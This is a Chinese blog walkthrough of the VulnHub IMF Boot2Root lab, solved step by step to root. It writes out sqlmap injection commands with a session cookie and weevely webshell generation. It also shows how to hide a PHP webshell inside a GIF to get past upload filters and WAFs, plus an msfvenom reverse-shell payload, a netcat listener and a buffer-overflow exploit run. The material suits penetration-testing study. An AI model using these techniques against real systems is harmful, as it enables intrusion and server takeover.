本文分享了IMF Boot2Root靶机的攻破过程,包括文件上传、SQL注入、缓冲区溢出等技巧,最终获取root权限。
靶机地址:https://www.vulnhub.com/entry/imf-1,162/
靶机难度:中级(CTF)
靶机发布日期:2016年10月30日
靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志都包含下一个标志的提示。我希望您喜欢这个虚拟机并学到一些东西。
目标:得到root权限&找到四个flag.txt
靶机wp作者:Jack渡鸦
用虚拟机开启今天的靶机
第一步扫出目标靶机的IP
命令:arp-scan -l
用nmap扫了一下,发现就开了一个80端口,访问靶机IP的80端口
把flag的值解码,得到一个值allthefiles
在页面按ctrl+f搜索等号,找到另外一个based64值,把三段拼成一个ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==,解码得flag2{aW1mYWRtaW5pc3RyYXRvcg==}
对flag2里面的值解码得imfadministrator,访问一下发现是目录路径,一个登录框
查看源代码
提示:我不能让SQL工作,所以我硬编码的密码。它仍然很安全。——罗杰
由于登录页面有报错机制,所以我们可以判断一下正确的用户名,根据刚刚的提示试试Roger是不是正确的用户名,发现报错
之前访问的页面看到过人名,试试rmichaels是不是正确的用户名
试了一下hydra爆破密码,虽然爆破出来了好几个但是全部都是失效的无法登录,然后我用burp抓包
得到flag3{Y29udGludWVUT2Ntcw==}和一个路径cms.php?pagename=home
解码flag3的内容得continueTOcms
访问才发现的路径
加就单引号报错,说明存在sql注入,所以我们直接上sqlmap
这里因为是基于登录之后的sql注入,所以我们需要加上cookie值,在有一道cve的漏洞我讲过这个点
命令:sqlmap -o -u "http://192.168.0.154/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=c5h3o747t7678ocgt93ems0vm5" --batch -dbs
命令:sqlmap -o -u "http://192.168.0.154/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=c5h3o747t7678ocgt93ems0vm5" --batch -D admin -tables
命令:sqlmap -o -u "http://192.168.0.154/imfadministrator/cms.php?pagename=home" --cookie="PHPSESSID=c5h3o747t7678ocgt93ems0vm5" --batch -D admin -T pages --dump
访问找到的路径images/whiteboard.jpg,发现是一个二维码,扫描之后得到flag4
解码flag4里面的based64值,得到uploadr942.php,访问该路径发现一个文件上传的地方
使用kali上自带的一句话木马生成工具weevely生成php的木马(参考链接kali下的webshell工具-Weevely_@小张小张的博客-优快云博客_kali webshell工具)
知识点:weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。
命令:weevely generate duya w.php
(duya是密码,一会连接要用,你可以任意取一个,w.php是文件名称)
接下来交你们做一个图片木马把w.php拖到主机上,随便找个目录放进去,再到网上找一个gif图保存到那个目录,gif图越小越好.
然后打开cmd
命令:copy 1.gif/b + w.php 88.gif
然后就生成了88.gif,这个gif图里就包含者w.php里面的木马
我们把生成的88.gif上传上去,显示上传成功
接下来我们打开源代码,获得gif文件上传到服务器的文件名称 a25ec328b432
然后找到上传路径,再使用weevely进行连接
成功得到低权限shell,然后得到flag5{YWdlbnRzZXJ2aWNlcw==}
把flag5的值解密之后得到提示agentservices
根据提示查找文件
命令: find / -name agent &>2/dev/unull
在/usr/local/bin目录发现提示的信息,agent文件
查看agent发现是ELF 32位执行文件
用cat命令查看access_codes,发现提示SYN 7482,8279,9467
这边提示端口试探,我们可以使用knock命令试探一下
命令:knock -v 192.168.0.154 7482 8279 9467
查一下端口发现服务器运行7788应该就是agent的端口了
但是前面nmap没有扫描到,端口试探应该是针对这个端口的
连接一下7788端口,发现需要输入正确的id
没关系,我们先将agent文件下载到本地然后再分析
命令:file_download /usr/local/bin/agent /root/桌面/ssss/agent
先赋予agent文件可读可写可执行的权限,然后我们使用ltrace跟踪agent在执行过程中调用库函数的情况,第一次使用这个函数可能需要下载一下
知识点 ltrace:跟踪进程调用库函数
ltrace 能够跟踪进程的库函数调用,它会显现出调用了哪个库函数
命令:ltrace ./agent
在fgets处随便输入内容,然后strncmp函数会将我们输入的内容和agent ID进行对比,这样就使得agent的真实ID的为48093572
再次执行agent并输入正确id得到三个选项
- 提取分
- 请求提取
- 提交报告
其中选项2和3可以让用户输入内容,这样看来应该是要通过缓冲区溢出7788端口的agent程序,然后用二进制修改exp为agent进程创建一个shell,首先我们为msfvenom有效负载创建一个shellcode
使用msfvenom创建一个shellcode
命令: msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.154 LPORT=4489 -b “\x00\x0a\x0” -f python -o /root/桌面/ssss/k.py
指令解释:
-p 选择payload(此次因为agent是32位,所以使用X86
LHOST 、LPORT 监测主机IP和端口
-b 在生成的程序中避免出现的值
\x00 == 0x00 ASCII控制字符表中对应 NULL (空字符)
\x0a == 0X0a ASCII控制字符表中对应 LF (换行键)
\x0b == 0x0b ASCII控制字符表中对应 VT (垂直定位符号)
-f 指定生成xxx格式
-o 输入路径和文件
小知识点:
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。. shellcode常常使用机器语言编写。. 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令,Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务的。 Shellcode是溢出程序和蠕虫病毒的核心
生成这段shellcode之后,我们需要编写一个缓冲区溢出漏洞sploit的exp,我这边是直接在github上找了大佬写好的exp
我们把agentsploit.py下载下来拉到kali中,然后把原代码中的这段shellcode替换成我们刚刚用msfvenom生成的shellcode就可以了
开启监听
命令: nc -lvnp 4489
使用exp和对应的shellcode对7788服务器进行缓冲区溢出攻击
命令:python2 agentsploit.py 192.168.0.154 7788
成功连接得到root权限,拿到flag6
flag6解码得GhostProtocols,意思是幽灵协议
今天这台靶机涉及的知识点非常全面
1.有文件上传漏洞,
2.基于cookie的sql注入漏洞,
3.sqlmap的使用,
4.用kali自带的木马生成工具weevely生成绕waf的一句话木马
5.使用绕waf的木马和普通gif结合生成gif图片木马,
6.使用knock敲开隐藏的服务器端口,
7.使用ltrace函数跟踪进程的库函数调用从而得到正确id,
8.用msfvenom生成一个针对性的shellcode然后对目标服务器端口进行缓冲区溢出攻击从而得到root权限
今天的这台靶机结束,希望你们能从中学到东西,如果觉得还不错可以点个赞让我知道。我是渡鸦,每天更新一台vulnhub靶机,关注我带你打完百台靶机项目实战,欢迎老爷们关注我一起提升技术,留言进入vulnhub渗透测试交流群一起进步。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
